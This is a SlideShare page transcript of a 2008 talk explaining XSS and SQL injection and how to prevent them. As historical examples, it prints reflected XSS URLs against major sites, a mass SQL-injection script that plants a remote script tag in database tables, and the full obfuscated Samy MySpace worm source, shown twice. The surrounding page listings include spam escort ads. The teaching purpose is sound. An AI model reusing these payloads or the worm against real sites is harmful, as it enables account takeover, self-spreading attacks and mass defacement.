2 Roads to Redemption - Thoughts on XSS and SQLIA
guestfdcb8a
 
Hacking - Web based attacks
Hacking - Web based attacksHacking - Web based attacks
Hacking - Web based attacks
VNIT-ACM Student Chapter
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Michael Peters
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets Mallory
Emily Stark
 

Similar to Web Security Horror Stories (20)

PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville   Web Security 1012009 Barcamp Nashville   Web Security 101
2009 Barcamp Nashville Web Security 101
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Reverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious Javascript
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
Web Security
Web SecurityWeb Security
Web Security
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Brakeman
BrakemanBrakeman
Brakeman
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
Hacking - Web based attacks
Hacking - Web based attacksHacking - Web based attacks
Hacking - Web based attacks
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets Mallory
 

More from Simon Willison

How Lanyrd does Geo
How Lanyrd does GeoHow Lanyrd does Geo
How Lanyrd does Geo
Simon Willison
 
Cheap tricks for startups
Cheap tricks for startupsCheap tricks for startups
Cheap tricks for startups
Simon Willison
 
The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)
Simon Willison
 
Building Lanyrd
Building LanyrdBuilding Lanyrd
Building Lanyrd
Simon Willison
 
How we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphHow we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graph
Simon Willison
 
Web Services for Fun and Profit
Web Services for Fun and ProfitWeb Services for Fun and Profit
Web Services for Fun and Profit
Simon Willison
 
Tricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationTricks & challenges developing a large Django application
Tricks & challenges developing a large Django application
Simon Willison
 
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricAdvanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Simon Willison
 
How Lanyrd uses Twitter
How Lanyrd uses TwitterHow Lanyrd uses Twitter
How Lanyrd uses Twitter
Simon Willison
 
ScaleFail
ScaleFailScaleFail
ScaleFail
Simon Willison
 
Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approval
Simon Willison
 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The Libraries
Simon Willison
 
Building crowdsourcing applications
Building crowdsourcing applicationsBuilding crowdsourcing applications
Building crowdsourcing applications
Simon Willison
 
Evented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesEvented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunnies
Simon Willison
 
Cowboy development with Django
Cowboy development with DjangoCowboy development with Django
Cowboy development with Django
Simon Willison
 
Crowdsourcing with Django
Crowdsourcing with DjangoCrowdsourcing with Django
Crowdsourcing with Django
Simon Willison
 
Django Heresies
Django HeresiesDjango Heresies
Django Heresies
Simon Willison
 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with Django
Simon Willison
 
Web App Security Horror Stories
Web App Security Horror StoriesWeb App Security Horror Stories
Web App Security Horror Stories
Simon Willison
 
When Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthWhen Zeppelins Ruled The Earth
When Zeppelins Ruled The Earth
Simon Willison
 

More from Simon Willison (20)

How Lanyrd does Geo
How Lanyrd does GeoHow Lanyrd does Geo
How Lanyrd does Geo
 
Cheap tricks for startups
Cheap tricks for startupsCheap tricks for startups
Cheap tricks for startups
 
The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)
 
Building Lanyrd
Building LanyrdBuilding Lanyrd
Building Lanyrd
 
How we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphHow we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graph
 
Web Services for Fun and Profit
Web Services for Fun and ProfitWeb Services for Fun and Profit
Web Services for Fun and Profit
 
Tricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationTricks & challenges developing a large Django application
Tricks & challenges developing a large Django application
 
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricAdvanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
 
How Lanyrd uses Twitter
How Lanyrd uses TwitterHow Lanyrd uses Twitter
How Lanyrd uses Twitter
 
ScaleFail
ScaleFailScaleFail
ScaleFail
 
Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approval
 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The Libraries
 
Building crowdsourcing applications
Building crowdsourcing applicationsBuilding crowdsourcing applications
Building crowdsourcing applications
 
Evented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesEvented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunnies
 
Cowboy development with Django
Cowboy development with DjangoCowboy development with Django
Cowboy development with Django
 
Crowdsourcing with Django
Crowdsourcing with DjangoCrowdsourcing with Django
Crowdsourcing with Django
 
Django Heresies
Django HeresiesDjango Heresies
Django Heresies
 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with Django
 
Web App Security Horror Stories
Web App Security Horror StoriesWeb App Security Horror Stories
Web App Security Horror Stories
 
When Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthWhen Zeppelins Ruled The Earth
When Zeppelins Ruled The Earth
 

Recently uploaded

Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
Matthias Neugebauer
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
Priyanka Aash
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
Priyanka Aash
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
SynapseIndia
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
sunilverma7884
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
Google Developer Group - Harare
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
Enterprise Knowledge
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
Arpan Buwa
 
Zaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdfZaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdf
AmandaCheung15
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
DianaGray10
 
kk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdfkk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdf
KIRAN KV
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
alexjohnson7307
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
SubhamMandal40
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
ZachWylie3
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
janagijoythi
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
Steven Carlson
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
bellared2
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
Zilliz
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
Retrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with RagasRetrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with Ragas
Zilliz
 

Recently uploaded (20)

Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
 
Finetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and DefendingFinetuning GenAI For Hacking and Defending
Finetuning GenAI For Hacking and Defending
 
Redefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI CapabilitiesRedefining Cybersecurity with AI Capabilities
Redefining Cybersecurity with AI Capabilities
 
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptxUse Cases & Benefits of RPA in Manufacturing in 2024.pptx
Use Cases & Benefits of RPA in Manufacturing in 2024.pptx
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
 
Google I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged SlidesGoogle I/O Extended Harare Merged Slides
Google I/O Extended Harare Merged Slides
 
Improving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning ContentImproving Learning Content Efficiency with Reusable Learning Content
Improving Learning Content Efficiency with Reusable Learning Content
 
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and CitiesThe Impact of the Internet of Things (IoT) on Smart Homes and Cities
The Impact of the Internet of Things (IoT) on Smart Homes and Cities
 
Zaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdfZaitechno Handheld Raman Spectrometer.pdf
Zaitechno Handheld Raman Spectrometer.pdf
 
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision MakingConnector Corner: Leveraging Snowflake Integration for Smarter Decision Making
Connector Corner: Leveraging Snowflake Integration for Smarter Decision Making
 
kk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdfkk vathada _digital transformation frameworks_2024.pdf
kk vathada _digital transformation frameworks_2024.pdf
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
 
Sonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdfSonkoloniya documentation - ONEprojukti.pdf
Sonkoloniya documentation - ONEprojukti.pdf
 
Camunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptxCamunda Chapter NY Meetup July 2024.pptx
Camunda Chapter NY Meetup July 2024.pptx
 
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptxMAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
MAKE MONEY ONLINE Unlock Your Income Potential Today.pptx
 
Vulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive OverviewVulnerability Management: A Comprehensive Overview
Vulnerability Management: A Comprehensive Overview
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
 
It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...It's your unstructured data: How to get your GenAI app to production (and spe...
It's your unstructured data: How to get your GenAI app to production (and spe...
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
 
Retrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with RagasRetrieval Augmented Generation Evaluation with Ragas
Retrieval Augmented Generation Evaluation with Ragas
 

Web Security Horror Stories

  • 1. Web Security Horror Stories The Dire ctor’s C ut Simon Willison, 26th October 2008
  • 2. The edited version • On Friday, I spent 15 minutes introducing: • XSS • CSRF / login CSRF • SQL injection • Clickjacking • I promised this talk would provide fixes
  • 3. XSS • Cross-site scripting • Attacker injects JavaScript code in to your site • Amazingly common • A single XSS hole on your domain compromises your security, entirely
  • 4. Alex Russell: If you are subject to an XSS, the same domain policy already ensures that you’re f’d. An XSS attack is the “root” or “ring 0” attack of the web. http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-film-at-11/
  • 5. The same origin policy “The same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin. This policy dates all the way back to Netscape Navigator 2.0.” https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
  • 6. Why? • Without the same origin policy, I could load your site in a frame, iframe or popup window from my site... • ... and steal data from it • ... or rewrite it with my own modifications • evil.hax.ru should not be able to read secret-wiki.bigco.intl • XMLHttpRequest has the same policy
  • 7. Things I can do if you have an XSS hole • Steal your users’ cookies and log in as them • Show a fake phishing login page on your site • Embed malware and drive-by downloads • Perform any action as if I was your user
  • 8. Two categories of XSS • Reflected • I embed my JS in a link to your site and trick your user in to following it • Persistent • I get my XSS in to your site’s database somehow so that it shows up on your pages
  • 9. http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script> http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript% 20src=http://ckers.org/s%3E http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/ thread/1ab38554971acfc9')&+eval (alert(document.cookie))&+eval('?tvc=2 http://search.live.com/images/results.aspx? q=1&first=21&FORM=PEIRquot;><script>alert('securitylab.ru')</script> All from http://xssed.com/
  • 13. If you’re gluing SQL strings together with string appends,
  • 14. • Wrong: • $sql = quot;select * from users where username = 'quot; . $username . quot;'quot;; • Right: • $results = db_query(quot;select * from users where username = ?quot;, $username);
  • 15. Mass XSS via SQL injection DECLARE @T varchar(255), @C varchar(255); DECLARE Table_Cursor CURSOR FOR SELECT a.name, b.name FROM sysobjects a, syscolumns b WHERE a.id = b.id AND a.xtype = 'u' AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167); OPEN Table_Cursor; FETCH NEXT FROM Table_Cursor INTO @T, @C; WHILE (@@FETCH_STATUS = 0) BEGIN EXEC( 'update [' + @T + '] set [' + @C + '] = rtrim(convert(varchar,[' + @C + ']))+ ''<script src=http://evilsite.com/1.js></script>''' ); FETCH NEXT FROM Table_Cursor INTO @T, @C; END; CLOSE Table_Cursor; DEALLOCATE Table_Cursor; http://hackademix.net/2008/04/26/mass-attack-faq/
  • 16. Preventing XSS • Use a tool that escapes everything on output • Only unescape stuff that you know is safe and you know contains markup you want to execute • IE 8 has an XSS filter; this is irrelevant to developers • httpOnly cookies are mostly a waste of time
  • 17. HTML “sanitisation” • My users need to be able to add links and basic styles to their submissions • “I’ll let them use HTML and remove anything nasty” • An extremely common vector for XSS • MySpace • LiveJournal • Almost anyone else who tries
  • 18. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS ['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if (J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS ['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter (AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj ();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm() {if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2 (BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open (BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form- urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
  • 19. samy is my hero http://namb.la/popular/
  • 20. A social network worm • XSS hole in MySpace’s HTML filter • When you viewed Samy’s profile... • JS makes you add him as a friend • JS uses XMLHttpRequest to add his exploit to YOUR profile as well
  • 21. 20 hours, 1,005,831 friend requests (then MySpace crashed)
  • 22. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode (39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else {return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL (AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split ('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com') {document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()} function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV) {var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1) {Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST') {J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content- Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG +'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring (0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e) {Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace ('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn (AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS ['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if (J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS ['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter (AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj ();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm() {if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2 (BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open (BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form- urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></DIV>
  • 23. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;...quot;> eval('document.body.inne' + 'rHTML'); eval('xmlhttp.onread' + 'ystatechange = callback'); http://namb.la/popular/tech.html
  • 24. Things to remember • Whitelist, don’t blacklist • You’re programming against undocumented parsing routines in closed-source browsers • Distrust any library that doesn’t have a unit test suite a mile long • http://ha.ckers.org/xss.html • http://code.google.com/p/html5lib/ is promising
